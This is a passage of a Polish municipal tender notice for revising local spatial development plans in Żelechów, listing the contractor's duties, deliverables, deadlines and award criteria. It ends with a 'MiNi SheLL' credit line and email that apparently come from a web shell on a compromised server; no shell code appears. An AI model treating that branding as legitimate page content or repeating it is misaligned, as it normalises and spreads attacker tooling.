-uczestniczenia, przeprowadzenia i pełnej obsługi wyłożenia projektu do publicznego wglądu. Obsługa  wyłożenia  powinna  zapewnić  sprawne  przeprowadzenie tego  etapu  procedury,
-przygotowanie projektu rozpatrzenia uwag po zakończeniu okresu wyłożenia planu,  
-wprowadzenia zmian do projektu planu wynikających z rozpatrzenia uwag a następnie w niezbędnym zakresie ponowienia uzgodnień,
-przygotowania kompletu projektu materiałów planistycznych w ilości 16 kpl. (w wersji papierowej dopuszcza się odpowiednie zmniejszenie rysunku planu do skali zapewniającej  czytelność) celem przekazania Radnym Rady Miejskiej na posiedzenie Komisji opiniujących projekt planu,
-przedstawienia Radzie Miejskiej projektu planu wraz z listą nieuwzględnionych uwag i uzasadnieniem.
-Przygotowania kompletu materiałów dot. uchwalenia projektu planu wraz z uzasadnieniem dla  Burmistrza  w celu   przedstawienia   Radzie Miejskiej .
-udział  w posiedzeniach  Komisji  i Sesjach  Rady Miejskiej oraz innych  spotkaniach, których  konieczność wyniknie w trakcie  procedury. Wykonawca jest zobowiązany do wyjaśnienia rozwiązań dotyczących projektu i zawartych w nim opracowań,
-przygotowanie dokumentacji formalno - prawnej w formie książkowej, obejmującej problematykę wymaganą przez Wojewodę w celu oceny zgodności z prawem,
-wprowadzenie do uchwały zatwierdzającej miejscowy plan zmian wynikających z rozstrzygnięć nadzorczych Wojewody (ewentualnie powtórzenie procedury w wymaganym przez Wojewodę zakresie),
-w przypadku ponowienia procedury - ponowne opracowanie niezbędnych dokumentów i ponowienie niezbędnych czynności, udział w czynnościach niezbędnych do ewentualnego doprowadzenia mpzp do zgodności z przepisami; ;
- sporządzenia wykazu dotyczącego łącznej powierzchni przeznaczenia terenów w uchwalonym miejscowym planie zagospodarowania przestrzennego (ha i %) w rozbiciu na: - powierzchnię miejscowego planu zagospodarowania przestrzennego - ogółem, - powierzchnię: zabudowy ogółem, zabudowy wielorodzinnej, zabudowy usługowej ogółem, usług publicznych, terenów użytkowanych rolniczo ogółem, zabudowy zagrodowej, zabudowy techniczno-produkcyjnej, zieleni i wód, komunikacji, infrastruktury technicznej, łączną powierzchnię terenów, dla których zmieniono przeznaczenie gruntów rolniczych na cele nierolnicze oraz gruntów leśnych na cele nieleśne.
-wszystkie uzgodnienia pomiędzy Wykonawcą, a Zamawiającym dotyczące przedmiotu zamówienia w trakcie jego realizacji , należy dokonywać na piśmie w formie notatki  służbowej.
Nie należy wyceniać kosztów związanych z publikacją ogłoszeń i prowadzoną korespondencją wynikającą z procedury planistycznej.  	
	Opracowanie należy sporządzić w oparciu o ustalenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów.
Stopień zgodności przewidywanych rozwiązań planu z ustaleniami studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r.
	Opracowanie miejscowego planu zagospodarowania przestrzennego dla wskazanych obszarów będzie musiało być poprzedzone sporządzeniem w części zmiany obowiązującego studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r. W dniu 9 lipca 2015r. Rada Miejska w Żelechowie podjęła  uchwałę Nr VIII/62/2015 w sprawie przystąpienia do sporządzenia zmiany obowiązującego studium.
Obecnie trwa procedura planistyczna zmiany studium. Należy przyjąć, iż obszerny zakres regulacji studium z uwagi na dość ogólną konstrukcję swoich ustaleń pozwala na  zachowanie uniwersalnej zgodności  w stosunku do projektowanych rozwiązań w planie miejscowym - podstawowe przeznaczenie terenu proponowane w projekcie planu miejscowego będzie zgodne z polityką przestrzenną określoną w studium. Ponadto rozwiązania zaproponowane w projekcie planu nie będą naruszały ustaleń studium w zakresie: racjonalnego gospodarowania przestrzenią, ochrony środowiska przyrodniczego,ochrony środowiska kulturowego, rozbudowy i modernizacji systemu transportowo - komunikacyjnego, rozwoju systemów infrastruktury technicznej i komunalnej, itp.
Po uchwaleniu - studium dopuszczać będzie realizację planowanych zamierzeń inwestycyjnych, dlatego też ustalenia  planu miejscowego nie będą naruszać ustaleń studium.	
Dokumentacja zostanie przekazana przez Wykonawcę w następujących ilościach:
-	kompletną uchwałę w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego wraz z załącznikami zawierającymi część tekstową i graficzną w formie papierowej w 6 egzemplarzach ; wydruki części graficznej kolorowe  oraz wersję  elektroniczną na płycie CD - 5 egz.
-	opracowanie ekofizjograficzne ( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	rysunek planu  w kolorze w formie książkowej (1 egz.) zalaminowany, podzielony na sekcje w formacie A3 z zachowaniem skali rysunku planu ;
-	prognoza oddziaływania na środowisko - (po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	prognoza skutków finansowych( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	1  egzemplarz kolorowej planszy rysunku planu pomniejszony do skali 1:5 000 do zawieszenia na ścianie dwustronnie zalaminowany i oprawiony w listwy.

Uchwała powinna być też dodatkowo przekazana w formacie XML-EDAP celem publikacji w Dzienniku Urzędowym Województwa Mazowieckiego.
Dodatkowo w/w dane planistyczne należy opracować w sposób opisany szczegółowo w dokumencie Standardy Zapisu Dokumentów Planistycznych w celu zasilenia aplikacji Rejestr Planów. Standardy Zapisu Dokumentów Planistycznych będą stanowić załącznik do umowy.

Wykonawca przeniesie na Zamawiającego (bez odrębnego wynagrodzenia) własność oryginałów utworów wykonywanych w ramach umowy oraz majątkowych praw autorskich  do nich na następujących polach eksploatacji:
          a) zrealizowanie , w tym również przez osoby trzecie;
b) wykonywanie zależnych praw autorskich , w szczególności zezwolenie na korzystanie utworów zależnych;
c) trwałe lub czasowe zwielokrotnienie utworów techniką drukarską, reprograficzną, zapis magnetycznego oraz techniką cyfrową;
         d) wprowadzanie utworów do obrotu, użyczenie lub najem oryginału albo powielonych egzemplarzy, w szczególności wykorzystanie w trakcie prowadzonych robót   budowlanych  i procedur związanych z ich   przeprowadzaniem;
         e) publiczne wykonywanie, wystawienie, wyświetlenie , odtworzenie oraz publiczne udostępnienie utworów  taki sposób , aby każdy mógł mieć  do niego  dostęp w miejscu i w czasie przez siebie wybranym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2017.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Sporządzenie miejscowego planu zagospodarowania przestrzennego miasta i gminy Żelechów (etap II).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie zmian miejscowych  planów zagospodarowania przestrzennego:
-	Miasta Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIX/131/05 z dnia 15 lutego 2005r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 66, poz.1725 z dnia 29 marca 2005r.);
-	Miasta Żelechów uchwalonego Uchwałą Nr X/64/2015 Rady Miejskiej w Żelechowie z dnia 17 września 2015r. (ogł. Dz. Urz. Woj. Mazowieckiego z dnia 13.11.2015r. poz. 9051).
-	Miasta Żelechów, teren zabytkowego parku dworskiego uchwalonego Uchwałą nr XXVII/191/10 Rady Miejskiej w Żelechowie z dnia 18 marca 2010r. (ogł. Dz. Urz. Woj. Mazowieckiego  nr 123, poz. 2713 z 22.06.2010r.).
które stanowią realizację uchwały Nr XX/134/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego miasta Żelechów,
oraz
- Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie nr XIV/93/04 z dnia 7 kwietnia 2004r. (ogł. Dz. Urzędowy Województwa Mazowieckiego Nr 133, poz.3277 z dnia 03 czerwca 2004r.)
- miejscowego planu zagospodarowania przestrzennego dla części obrębów geodezyjnych Stary Goniwilk, Kalinów, Nowy Goniwilk, Piastów, Władysławów w gminie Żelechów uchwalonym uchwałą Rady Miejskiej w Żelechowie nr LII/370/14 z dnia 30 października 2014r. /ogł. Dz. Urz. Woj. Mazowieckiego, poz. 10606 z dnia 24 listopada 2014r./
które stanowią realizację uchwały Nr XX/136/2016 Rady Miejskiej w Żelechowie z dnia 16 czerwca 2016r. w sprawie przystąpienia do sporządzenia miejscowego planu zagospodarowania przestrzennego gminy Żelechów.
Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/134/2016 obejmuje opracowanie mpzp  dla obszaru fragmentu miasta Żelechów w kierunku północnym od ulicy Długiej. Obszar objęty zmianą  wynosi  ok. 413 ha.
Zakres zmiany miejscowego planu zagospodarowania przestrzennego, określony uchwałą intencyjną Nr XX/136/2016 obejmuje opracowanie mpzp  dla  obrębów geodezyjnych Gózdek, Łomnica, Nowy Goniwilk, Stary Goniwilk, Kalinów, Piastów, Wola Żelechowska  w gminie Żelechów.
Obszar objęty zmianą  wynosi  ok. 3189 ha ( w granicach administracyjnych  obrębów geodezyjnych Gózdek, Łomnica, Nowy Goniwilk, Stary Goniwilk, Kalinów, Piastów, Wola Żelechowska w gminie Żelechów).
	Przedmiot zamówienia powinien być wykonany zgodnie z obowiązującymi przepisami ( co do zakresu  i formy  oraz procedury wykonania), z uwzględnieniem wymogów określonych w  ustawie z dnia 27 marca 2003 r. o planowaniu i zagospodarowaniu przestrzennym (Dz. U. z 2016 r. poz. 778) oraz przepisów wykonawczych w tym rozporządzenia  Ministra Infrastruktury z  dnia 26 sierpnia 2003 r. w  sprawie zakresu  projektu miejscowego planu zagospodarowania przestrzennego (Dz. U. Nr 164, poz. 1587) wraz z przeprowadzeniem strategicznej oceny  oddziaływania na środowisko, zgodnie z przepisami ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U. z  2016 r. poz.353).

Plan opracować stosownie do art. 16  w/w ustawy o planowaniu i zagospodarowaniu przestrzennym  na kopiach map zasadniczych albo w przypadku ich braku na mapach katastralnych,  gromadzonych w państwowym  zasobie geodezyjnym i kartograficznym.
Wymagana skala części graficznej planu: zgodnie z obowiązującymi przepisami.
Zamawiający pozyskał w kwietniu 2016 roku mapy ewidencyjne gruntów i budynków w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf w skali 1:1000 dla obszaru miasta i gminy Żelechów. Ponadto w lipcu 2017 roku Zamawiający wystąpił do Starosty Powiatu Garwolińskiego z wnioskiem o udostępnienie danych zgromadzonych w rejestrze publicznym dot. map ewidencyjnych w skali 1:2000 w wersji elektronicznej w postaci wektorowej w rozszerzeniu .dxf dla obszaru gminy Żelechów oraz map ewidencyjnych w skali 1:1000 w wersji elektronicznej dla miasta Żelechów.

Wszelkie prace projektowe lub czynności nie opisane niżej, a wynikające z procedur określonych w ustawie o planowaniu i zagospodarowaniu przestrzennym oraz przepisach szczególnych, niezbędne do właściwego i kompleksowego opracowania dokumentacji projektowej, należy traktować jako oczywiste i uwzględnić w kosztach i terminach wykonania przedmiotu zamówienia.      
W ramach sporządzenia przedmiotu zamówienia Wykonawca uwzględni ewentualne zmiany przepisów prawa i dostosuje do nich opracowania, będące przedmiotem umowy, w ramach zawartej umowy i ceny ofertowej.

	Konieczność zmiany planu wynika z potrzeby uwzględnienia wniosków o zmianę planu, aktualizacji rozwiązań przestrzennych i przeznaczenia terenów dostosowując je do obecnych potrzeb.
 	Zapisy obowiązujących miejscowych planów zagospodarowania przestrzennego, nie obejmują wszystkich obligatoryjnych ustaleń występujących na obszarze objętym planem zgodnie z obowiązującą ustawą, dlatego też podejmowane są działania zmierzające do aktualizacji planów zgodnie z obowiązującą ustawą oraz zgodnie ze zmianami przeznaczenia i zagospodarowania terenów wyznaczonych w studium uwarunkowań i kierunków zagospodarowania przestrzennego miasta i gminy Żelechów.

Do projektu planu należy wykonać:
1/opracowanie ekofizjograficzne dla terenu objętego zmianą planu.
2/Opracowanie projektu  planu.
3/Opracowanie prognozy oddziaływania na środowisko zgodnie z ustawą z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz. U z 2016 r. poz. 353) oraz podsumowania i uzasadnienia w ramach przeprowadzenia strategicznej oceny oddziaływania na środowisko, o których mowa w art. 42 i art. 55 ust. 3 w/w ustawy.
4/prognozę skutków finansowych uchwalenia planu.

Wykonawca opracuje i przekaże Zamawiającemu materiały planistyczne oraz materiały projektu planu na poszczególnych etapach opracowania, w ilościach niezbędnych dla prawidłowego przeprowadzenia procedury formalno-prawnej sporządzania planu.

-Wykonawca jest zobowiązany do:
- przygotowania projektów korespondencji, wykazów i innych dokumentów, których potrzeba wyłoni się w trakcie opracowania zmiany planu,
-przygotowania ogłoszenia do prasy miejscowej oraz obwieszczenia o podjęciu uchwały  o przystąpieniu do sporządzenia planu zagospodarowania  przestrzennego, określając   formę , miejsce i termin  składania wniosków,
-przygotowania zawiadomienia na piśmie o podjęciu uchwały o przystąpieniu do sporządzania planu zagospodarowania przestrzennego  dla instytucji i organów  właściwych do uzgadniania i opiniowania  projektu planu wraz z wykazem instytucji i organów i ich danymi adresowymi,
-dokonania oceny istniejącego stanu zagospodarowania, charakteru istniejącej zabudowy;
-rozpatrzenia   wniosków  i uwag o których mowa w art. 17 ustawy z dnia 27 marca 2003r. o planowaniu i zagospodarowaniu przestrzennym i art. 55 ustawy z dnia 3 października 2008 r. o udostępnianiu informacji o środowisku I jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko  (Dz. U z 2016 r. poz.353),
-sporządzenia  projektu  w/w miejscowego planu  wraz z prognozą  oddziaływania na środowisko uwzględniając ustalenia zawarte w Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów,
-sporządzenia prognozy skutków finansowych uchwalenia przedmiotowego planu z uwzględnieniem art. 36 uopizp,
-uzyskania od gminnej komisji urbanistyczno-architektonicznej opinii o projekcie miejscowego planu  zagospodarowania przestrzennego oraz uzyskania od wójtów, burmistrzów gmin i prezydenta miasta, graniczących z obszarem objętym planem, w zakresie rozmieszczenia inwestycji celu publicznego o znaczeniu lokalnym,
-przygotowania wystąpień o opinie i uzgodnienia dot. projektu  planu do właściwych  instytucji i organów, przygotowanie wykazu instytucji i organów wraz z  ich danymi adresowymi),
-na etapie opiniowania i uzgadniania projektu planu wykonawca  przekaże projekt dokumentu w ilości i formie niezbędnej do sprawnego przeprowadzenia procedury uzyskania opinii i uzgodnień wynikających z przepisów prawa;
-opracowanie wniosku o zgodę na zmianę przeznaczenia gruntów rolnych i leśnych na cele nierolnicze i nieleśne,   w przypadku gdy teren objęty zmianą planu takiej zgody nie posiada.
-wprowadzenia zmian wynikających z uzyskanych opinii i uzgodnień,
-przygotowania  ogłoszenia i obwieszczenia  o wyłożeniu projektu  do publicznego  wglądu wraz z prognozą oddziaływania na środowisko oraz zorganizowania w tym czasie dyskusji publicznej nad przyjętymi  w projekcie planu rozwiązaniami z jednoczesnym określeniem  terminu, w którym osoby prawe i fizyczne  oraz  jednostki  organizacyjne   będą  mogły  wnieść  uwagi do projektu planu. Ustalenie  w/w  terminów  po dokonaniu uzgodnień  z Zamawiającym. Na etapie wyłożenia projektu planu do publicznego wglądu wykonawca  przekaże projekt dokumentu w formie kolorowych wydruków+ 1 egz. w wersji elektronicznej,
-uczestniczenia, przeprowadzenia i pełnej obsługi wyłożenia projektu do publicznego wglądu. Obsługa  wyłożenia  powinna  zapewnić  sprawne  przeprowadzenie tego  etapu  procedury,
-przygotowanie projektu rozpatrzenia uwag po zakończeniu okresu wyłożenia planu,  
-wprowadzenia zmian do projektu planu wynikających z rozpatrzenia uwag a następnie w niezbędnym zakresie ponowienia uzgodnień,
-przygotowania kompletu projektu materiałów planistycznych w ilości 16 kpl. (w wersji papierowej dopuszcza się odpowiednie zmniejszenie rysunku planu do skali zapewniającej  czytelność) celem przekazania Radnym Rady Miejskiej na posiedzenie Komisji opiniujących projekt planu,
-przedstawienia Radzie Miejskiej projektu planu wraz z listą nieuwzględnionych uwag i uzasadnieniem.
-Przygotowania kompletu materiałów dot. uchwalenia projektu planu wraz z uzasadnieniem dla  Burmistrza  w celu   przedstawienia   Radzie Miejskiej .
-udział  w posiedzeniach  Komisji  i Sesjach  Rady Miejskiej oraz innych  spotkaniach, których  konieczność wyniknie w trakcie  procedury. Wykonawca jest zobowiązany do wyjaśnienia rozwiązań dotyczących projektu i zawartych w nim opracowań,
-przygotowanie dokumentacji formalno - prawnej w formie książkowej, obejmującej problematykę wymaganą przez Wojewodę w celu oceny zgodności z prawem,
-wprowadzenie do uchwały zatwierdzającej miejscowy plan zmian wynikających z rozstrzygnięć nadzorczych Wojewody (ewentualnie powtórzenie procedury w wymaganym przez Wojewodę zakresie),
-w przypadku ponowienia procedury - ponowne opracowanie niezbędnych dokumentów i ponowienie niezbędnych czynności, udział w czynnościach niezbędnych do ewentualnego doprowadzenia mpzp do zgodności z przepisami; ;
- sporządzenia wykazu dotyczącego łącznej powierzchni przeznaczenia terenów w uchwalonym miejscowym planie zagospodarowania przestrzennego (ha i %) w rozbiciu na: - powierzchnię miejscowego planu zagospodarowania przestrzennego - ogółem, - powierzchnię: zabudowy ogółem, zabudowy wielorodzinnej, zabudowy usługowej ogółem, usług publicznych, terenów użytkowanych rolniczo ogółem, zabudowy zagrodowej, zabudowy techniczno-produkcyjnej, zieleni i wód, komunikacji, infrastruktury technicznej, łączną powierzchnię terenów, dla których zmieniono przeznaczenie gruntów rolniczych na cele nierolnicze oraz gruntów leśnych na cele nieleśne.
-wszystkie uzgodnienia pomiędzy Wykonawcą, a Zamawiającym dotyczące przedmiotu zamówienia w trakcie jego realizacji , należy dokonywać na piśmie w formie notatki  służbowej.
Nie należy wyceniać kosztów związanych z publikacją ogłoszeń i prowadzoną korespondencją wynikającą z procedury planistycznej.  	
	Opracowanie należy sporządzić w oparciu o ustalenia Studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów.
Stopień zgodności przewidywanych rozwiązań planu z ustaleniami studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r.
	Opracowanie miejscowego planu zagospodarowania przestrzennego dla wskazanych obszarów będzie musiało być poprzedzone sporządzeniem w części zmiany obowiązującego studium uwarunkowań i kierunków zagospodarowania przestrzennego Miasta i Gminy Żelechów uchwalonego Uchwałą Rady Miejskiej w Żelechowie Nr LI/367/14 z dnia 30 września 2014r. W dniu 9 lipca 2015r. Rada Miejska w Żelechowie podjęła  uchwałę Nr VIII/62/2015 w sprawie przystąpienia do sporządzenia zmiany obowiązującego studium.
Obecnie trwa procedura planistyczna zmiany studium. Należy przyjąć, iż obszerny zakres regulacji studium z uwagi na dość ogólną konstrukcję swoich ustaleń pozwala na  zachowanie uniwersalnej zgodności  w stosunku do projektowanych rozwiązań w planie miejscowym - podstawowe przeznaczenie terenu proponowane w projekcie planu miejscowego będzie zgodne z polityką przestrzenną określoną w studium. Ponadto rozwiązania zaproponowane w projekcie planu nie będą naruszały ustaleń studium w zakresie: racjonalnego gospodarowania przestrzenią, ochrony środowiska przyrodniczego, ochrony środowiska kulturowego, rozbudowy i modernizacji systemu transportowo - komunikacyjnego, rozwoju systemów infrastruktury technicznej i komunalnej, itp.
Po uchwaleniu - studium dopuszczać będzie realizację planowanych zamierzeń inwestycyjnych, dlatego też ustalenia  planu miejscowego nie będą naruszać ustaleń studium.	
Dokumentacja zostanie przekazana przez Wykonawcę w następujących ilościach:
-	kompletną uchwałę w sprawie uchwalenia miejscowego planu zagospodarowania przestrzennego wraz z załącznikami zawierającymi część tekstową i graficzną w formie papierowej w 6 egzemplarzach ; wydruki części graficznej kolorowe  oraz wersję  elektroniczną na płycie CD - 5 egz.
-	opracowanie ekofizjograficzne ( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	rysunek planu  w kolorze w formie książkowej (1 egz.) zalaminowany, podzielony na sekcje w formacie A3 z zachowaniem skali rysunku planu ;
-	prognoza oddziaływania na środowisko - ( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	prognoza skutków finansowych( po 3 egz. wydruku w kolorze i 3 egz. w wersji elektronicznej);
-	1  egzemplarz kolorowej planszy rysunku planu pomniejszony do skali 1:5 000 do zawieszenia na ścianie dwustronnie zalaminowany i oprawiony w listwy.

Uchwała powinna być też dodatkowo przekazana w formacie XML-EDAP celem publikacji w Dzienniku Urzędowym Województwa Mazowieckiego.
Dodatkowo w/w dane planistyczne należy opracować w sposób opisany szczegółowo w dokumencie Standardy Zapisu Dokumentów Planistycznych w celu zasilenia aplikacji Rejestr Planów. Standardy Zapisu Dokumentów Planistycznych będą stanowić załącznik do umowy.

Wykonawca przeniesie na Zamawiającego (bez odrębnego wynagrodzenia) własność oryginałów utworów wykonywanych w ramach umowy oraz majątkowych praw autorskich  do nich na następujących polach eksploatacji:
          a) zrealizowanie , w tym również przez osoby trzecie;
b) wykonywanie zależnych praw autorskich , w szczególności zezwolenie na korzystanie utworów zależnych;
c) trwałe lub czasowe zwielokrotnienie utworów techniką drukarską, reprograficzną, zapis magnetycznego oraz techniką cyfrową;
         d) wprowadzanie utworów do obrotu, użyczenie lub najem oryginału albo powielonych egzemplarzy, w szczególności wykorzystanie w trakcie prowadzonych robót   budowlanych  i procedur związanych z ich   przeprowadzaniem;
         e) publiczne wykonywanie, wystawienie, wyświetlenie , odtworzenie oraz publiczne udostępnienie utworów  taki sposób , aby każdy mógł mieć  do niego  dostęp w miejscu i w czasie przez siebie wybranym..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.41.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2018.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 95</li>
<li>2. Doświadczenie - 5</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com